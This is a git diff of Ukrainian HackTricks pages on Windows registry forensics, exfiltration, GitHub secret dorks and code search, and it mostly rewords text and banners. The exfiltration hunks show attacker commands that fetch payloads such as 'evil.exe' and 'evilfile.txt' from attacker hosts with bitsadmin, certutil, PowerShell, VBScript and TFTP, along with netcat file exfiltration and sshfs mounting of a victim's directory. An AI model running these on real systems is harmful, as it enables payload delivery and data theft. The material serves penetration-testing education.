+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index ba07969fb..7b612a63b 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,20 +2,20 @@ ### Цікаві ключі реєстру Windows +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
- +{% endhint %} ### **Інформація про версію Windows та власника** - У розділі **`Software\Microsoft\Windows NT\CurrentVersion`** ви знайдете версію Windows, пакунок обслуговування, час встановлення та ім'я зареєстрованого власника простим способом. @@ -37,54 +37,69 @@ - Ввімкнення відстеження часу останнього доступу дозволяє вам бачити, коли файли востаннє відкривалися, що може бути критичним для судового аналізу або моніторингу системи. ### Деталі мережевої інформації -- Реєстр містить велику кількість даних про мережеві конфігурації, включаючи **типи мереж (бездротові, кабельні, 3G)** та **категорії мереж (Публічні, Приватні/Домашні, Доменні/Робочі)**, які є важливими для розуміння налаштувань мережевої безпеки та дозволів. +- Реєстр містить велику кількість даних про мережеві конфігурації, включаючи **типи мереж (бездротові, кабельні, 3G)** та **категорії мереж (Публічна, Приватна/Домашня, Домен/Робоча)**, які є важливими для розуміння налаштувань мережевої безпеки та дозволів. ### Кешування клієнтської сторони (CSC) -- **CSC** покращує доступ до файлів в автономному режимі шляхом кешування копій спільних файлів. Різні налаштування **CSCFlags** контролюють, як і які файли кешуються, впливаючи на продуктивність та користувацький досвід, особливо в середовищах з періодичним підключенням. +- **CSC** покращує доступ до файлів в автономному режимі шляхом кешування копій спільних файлів. Різні налаштування **CSCFlags** контролюють те, які файли кешуються та як це впливає на продуктивність та користувацький досвід, особливо в середовищах з періодичним з'єднанням. -### Програми, які автоматично запускаються +### Програми автозапуску - Програми, перераховані в різних ключах реєстру `Run` та `RunOnce`, автоматично запускаються при запуску системи, впливаючи на час завантаження системи та потенційно бувши точками інтересу для ідентифікації шкідливого ПЗ або небажаного програмного забезпечення. ### Shellbags -- **Shellbags** не лише зберігають налаштування для перегляду папок, але й надають судові докази доступу до папок навіть у випадку, якщо папка більше не існує. Вони є невартісними для розслідувань, розкриваючи діяльність користувача, яка не є очевидною іншими засобами. +- **Shellbags** не лише зберігають налаштування для перегляду папок, але також надають судові докази доступу до папок навіть у випадку, якщо папка більше не існує. Вони є невичерпним джерелом для розслідувань, розкриваючи діяльність користувача, яка не є очевидною іншими засобами. ### Інформація та судовий аналіз USB -- Деталі, збережені в реєстрі про USB-пристрої, можуть допомогти відстежити, які пристрої були підключені до комп'ютера, потенційно пов'язуючи пристрій з передачами чутливих файлів або випадками несанкціонованого доступу. +- Деталі, збережені в реєстрі про USB-пристрої, можуть допомогти відстежити, які пристрої були підключені до комп'ютера, потенційно пов'язуючи пристрій з передачею чутливих файлів або випадками несанкціонованого доступу. ### Серійний номер тома - **Серійний номер тома** може бути вирішальним для відстеження конкретного екземпляра файлової системи, корисний в судових сценаріях, де потрібно встановити походження файлу на різних пристроях. ### **Деталі вимкнення** -- Час вимкнення та кількість (останній тільки для XP) зберігаються в **`System\ControlSet001\Control\Windows`** та **`System\ControlSet001\Control\Watchdog\Display`**. +- Час вимкнення та кількість (останній лише для XP) зберігаються в **`System\ControlSet001\Control\Windows`** та **`System\ControlSet001\Control\Watchdog\Display`**. ### **Конфігурація мережі** - Для докладної інформації про мережевий інтерфейс звертайтеся до **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. - Перші та останні часи підключення до мережі, включаючи підключення VPN, реєструються в різних шляхах в **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. ### **Спільні папки** -- Спільні папки та налаштування знаходяться в **`System\ControlSet001\Services\lanmanserver\Shares`**. Налаштування кешування клієнтської сторони (CSC) визначають доступність файлів в автономному режимі. +- Спільні папки та налаштування знаходяться в розділі **`System\ControlSet001\Services\lanmanserver\Shares`**. Налаштування кешування клієнтської сторони (CSC) визначають доступність файлів в автономному режимі. ### **Програми, які автоматично запускаються** -- Шляхи, такі як **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** та подібні записи в `Software\Microsoft\Windows\CurrentVersion` деталізують програми, призначені для запуску при запуску системи. +- Шляхи, такі як **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** та подібні записи в `Software\Microsoft\Windows\CurrentVersion` деталізують програми, призначені для запуску при завантаженні. ### **Пошуки та введені шляхи** - Пошуки та введені шляхи в Explorer відстежуються в реєстрі під **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** для WordwheelQuery та TypedPaths відповідно. -### **Нещодавні документи та файлів Office** -- Недавно відкриті документи та файлів Office фіксуються в `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` та конкретних шляхах версій Office. +### **Нещодавні документи та файли Office** +- Недавні документи та файли Office, до яких зверталися, відзначені в `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` та конкретні шляхи версій Office. -### **Останні використані (MRU) елементи** +### **Останні використані елементи (MRU)** - Списки MRU, що вказують на останні шляхи файлів та команд, зберігаються в різних підключеннях `ComDlg32` та `Explorer` під `NTUSER.DAT`. ### **Відстеження активності користувача** -- Функція User Assist реєструє детальну статистику використання програм, включаючи кількість запусків та час останнього запуску, в **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +- Функція User Assist веде детальну статистику використання програм, включаючи кількість запусків та час останнього запуску, в **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. ### **Аналіз Shellbags** - Shellbags, які розкривають деталі доступу до папок, зберігаються в `USRCLASS.DAT` та `NTUSER.DAT` під `Software\Microsoft\Windows\Shell`. Використовуйте **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** для аналізу. ### **Історія USB-пристроїв** -- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** та **`HKLM\SYSTEM\ControlSet001\Enum\USB`** містять багато деталей про підключені USB-пристрої, включаючи виробника, назву продукту та часи підключення. +- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** та **`HKLM\SYSTEM\ControlSet001\Enum\USB`** містять важливі деталі про підключені USB-пристрої, включаючи виробника, назву продукту та часи підключення. - Користувач, пов'язаний з певним USB-пристроєм, може бути визначений шляхом пошуку уламків `NTUSER.DAT` для **{GUID}** пристрою. -- Останній підключений пристрій та його серійний номер тома можна відстежити через `System\MountedDevices` та `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, відповідно. +- Останній підключений пристрій та його серійний номер тома можна відстежити через `System\MountedDevices` та `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` відповідно. -Цей посібник узагальнює важливі шляхи та методи доступу до детальної інформації про систему, мережу та активність користувача в системах Windows, спрямований на зрозумілість та використовуваність. +Цей посібник узагальнює важливі шляхи та методи доступу до детальної інформації про систему, мережу та активність користувача в системах Windows, спрямований на зрозумілість та використовуваність. + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index b4ae1108e..55ebc688a 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -1,18 +1,19 @@ # Ексфільтрація +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа взлому HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} **Група Try Hard Security** @@ -187,27 +188,27 @@ service smbd restart ``` Windows +--- + ### Exfiltration -#### Bitsadmin -```plaintext -bitsadmin /transfer myjob /download /priority normal http://www.example.com/evilfile.txt C:\path\to\save\evilfile.txt -``` +Exfiltration is the unauthorized transfer of data from a target. There are various methods to exfiltrate data from a compromised system, including: -#### Certutil -```plaintext -certutil -urlcache -split -f http://www.example.com/evilfile.txt evilfile.txt -``` +- **Compression**: Compressing data before exfiltration can help evade detection. +- **Encryption**: Encrypting data can prevent unauthorized access if the exfiltrated data is intercepted. +- **Steganography**: Hiding data within other files or messages can help avoid detection. +- **Protocol Tunneling**: Using protocols such as DNS or HTTP to tunnel data out of a network can bypass security controls. +- **Data Exfiltration Tools**: Utilizing specialized tools designed for data exfiltration can simplify the process. -#### PowerShell -```plaintext -powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://www.example.com/evilfile.txt', 'C:\path\to\save\evilfile.txt')" -``` +Exfiltration can occur over various channels, including: -#### WMIC -```plaintext -wmic process call create "cmd.exe /c bitsadmin /transfer myjob /download /priority normal http://www.example.com/evilfile.txt C:\path\to\save\evilfile.txt" -``` +- **Email**: Sending data as email attachments. +- **DNS**: Using DNS queries to exfiltrate data. +- **HTTP/HTTPS**: Sending data over HTTP or HTTPS connections. +- **FTP**: Transferring data using FTP protocols. +- **Cloud Storage**: Uploading data to cloud storage services. + +It is essential for security professionals to understand exfiltration techniques to better protect against data breaches. ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials @@ -223,7 +224,7 @@ scp @:/ ``` ## SSHFS -Якщо жертва має SSH, зловмисник може змонтувати каталог з жертви на себе. +Якщо жертва має SSH, зловмисник може змонтувати каталог з жертви на зловмисника. ```bash sudo apt-get install sshfs sudo mkdir /mnt/sshfs @@ -231,7 +232,7 @@ sudo sshfs -o allow_other,default_permissions @ new_file nc -vn 4444 < exfil_file @@ -280,7 +281,7 @@ sudo python -m smtpd -n -c DebuggingServer :25 За замовчуванням у XP та 2003 (в інших потрібно явно додати під час встановлення) -У Kali, **запустіть TFTP сервер**: +У Kali **запустіть TFTP-сервер**: ```bash #I didn't get this options working and I prefer the python option mkdir /tftp @@ -298,15 +299,13 @@ tftp -i get nc.exe ``` ## PHP -Завантажте файл за допомогою PHP oneliner: +Завантажте файл за допомогою однорядкового PHP: ```bash echo "" > down2.php ``` ## VBScript -### VBScript - -VBScript (Visual Basic Scripting Edition) - це мова сценаріїв, яка використовується для розробки веб-сценаріїв та автоматизації завдань у середовищі Windows. VBScript може бути використаний для створення шкідливих сценаріїв, які виконуються на комп'ютері потенційною жертвою. +## VBScript ```bash Attacker> python -m SimpleHTTPServer 80 ``` @@ -344,32 +343,37 @@ cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` ## Debug.exe -Програма `debug.exe` не тільки дозволяє переглядати бінарні файли, але також має **можливість перебудовувати їх з шістнадцяткового коду**. Це означає, що, надаючи шістнадцятковий код бінарного файлу, `debug.exe` може згенерувати файл. Проте важливо зауважити, що у debug.exe є **обмеження на збирання файлів розміром до 64 кб**. +Програма `debug.exe` не тільки дозволяє переглядати бінарні файли, але також має **можливість перебудовувати їх з шістнадцяткового коду**. Це означає, що, надавши шістнадцятковий код бінарного файлу, `debug.exe` може згенерувати бінарний файл. Однак важливо зауважити, що у `debug.exe` є **обмеження на збирання файлів розміром до 64 кб**. ```bash # Reduce the size upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt ``` +Потім скопіюйте текст у вікно-оболонку та буде створено файл з назвою nc.exe. + +* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html) + ## DNS * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -**Група з безпеки Try Hard Security** +**Try Hard Security Group**
{% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +Навчайтесь та вправляйтесь у взломі AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Навчайтесь та вправляйтесь у взломі GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.** +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 5c32edb0b..1310d075d 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -1,21 +1,22 @@ # Github Dorks & Витоки +{% hint style="success" %} +Вивчайте та практикуйте Хакінг AWS:[**Школа Хакінгу HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте Хакінг GCP: [**Школа Хакінгу HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} \ -**Підказка щодо багів у винагороду**: **зареєструйтеся** на **Intigriti**, преміальній **платформі для пошуку багів, створеній хакерами для хакерів**! Приєднуйтесь до нас на [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) сьогодні, і почніть заробляти винагороди до **$100,000**! +**Підказка щодо багів у винагороду**: **зареєструйтеся** на **Intigriti**, преміальній **платформі для пошуку багів, створеній хакерами для хакерів**! Приєднуйтесь до нас на [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) сьогодні, та почніть заробляти винагороди до **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -321,16 +322,17 @@ GCP SECRET AWS SECRET "private" extension:pgp ``` +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Школа хакінгу HackTricks для експертів червоної команди AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Школа хакінгу HackTricks для експертів червоної команди GCP (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДТРИМКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index edb0c798f..f3b2c6bfd 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -1,20 +1,21 @@ # Широкий пошук вихідного коду +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} -**Try Hard Security Group** +**Група Try Hard Security**
@@ -22,36 +23,37 @@ *** -Мета цієї сторінки - перерахувати **платформи, які дозволяють шукати код** (буквальний або regex) в тисячах/мільйонах репозиторіїв на одній або декількох платформах. +Метою цієї сторінки є перелік **платформ, які дозволяють шукати код** (літеральний або регулярний вираз) в тисячах/мільйонах репозиторіїв на одній або декількох платформах. -Це допомагає в декількох випадках **шукати витік інформації** або шаблони **вразливостей**. +Це допомагає у декількох випадках **шукати витік інформації** або шаблони **вразливостей**. -* [**SourceGraph**](https://sourcegraph.com/search): Пошук в мільйонах репозиторіїв. Є безкоштовна версія та корпоративна версія (з 15-денною пробною версією). Підтримує regex. -* [**Пошук на Github**](https://github.com/search): Пошук по Github. Підтримує regex. +* [**SourceGraph**](https://sourcegraph.com/search): Пошук у мільйонах репозиторіїв. Є безкоштовна версія та корпоративна версія (з 15-денною пробною версією). Підтримує регулярні вирази. +* [**Пошук на Github**](https://github.com/search): Пошук по Github. Підтримує регулярні вирази. * Можливо, буде корисно також перевірити [**Пошук коду на Github**](https://cs.github.com/). -* [**Розширений пошук Gitlab**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Пошук по проектах Gitlab. Підтримує regex. +* [**Розширений пошук Gitlab**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Пошук по проектах Gitlab. Підтримує регулярні вирази. * [**SearchCode**](https://searchcode.com/): Пошук коду в мільйонах проектів. {% hint style="warning" %} -Коли ви шукаєте витоки в репозиторії та запускаєте щось на кшталт `git log -p`, не забудьте, що можуть бути **інші гілки з іншими комітами**, що містять секрети! +Коли ви шукаєте витоки в репозиторії та запускаєте щось на кшталт `git log -p`, не забувайте, що можуть бути **інші гілки з іншими комітами**, що містять секрети! {% endhint %} -**Try Hard Security Group** +**Група Try Hard Security**
{% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index e04ece97a..2f413bb1b 100644 --- a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
